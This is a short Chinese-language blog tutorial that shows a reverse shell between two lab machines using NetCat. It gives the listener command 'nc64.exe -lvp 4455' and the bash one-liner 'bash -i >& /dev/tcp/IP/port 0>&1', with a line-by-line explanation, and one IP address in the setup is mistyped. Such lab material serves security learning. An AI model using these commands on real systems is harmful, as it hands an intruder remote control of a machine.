NC反弹系统shell一例

NC(NetCat)号称安全界的瑞士军刀,程序小巧,但是功能巨多且好用,今天利用NC实现反弹shell一例。

实验环境:

主机A:WIN7 安装了NC  IP:192.168.1.103

主机B:kali  未安装NC  IP:192.1668.1.106

目的:在主机A上启用NC,与未安装NC的主机B之间通信,在A上实现B的shell反弹。


 

步骤很简单:
1、首先在A上启动NC,实现侦听服务:

nc64.exe  -lvp   4455

1

-l  侦听

-v 带显示

-p  端口

即在主机A 192.168.1.103 4455端口上开启侦听服务。

 

2、在B上利用bash进行反弹:

2

bash -i >& /dev/tcp/192.168.1.103/4455 0>&1

bash -i >& /dev/tcp/ip/port 0>&1

在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ,如果在其后加文件描述符,是将bash -i 交互模式传递给文件描述符,而如果其后是文件,则将bash -i 交互模式传递给文件。/dev/tcp/ip/port表示传递给远程主机的IP地址对应的端口。

文件描述符: 0 标准输入、1标准输出、2、错误输入输出

命令中的 0>&1 表示将标准输入重定向到标准输出,实现远程的输入可以在远程输出对应内容。

3、主机A上的结果

3 4

 

反弹成功。

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录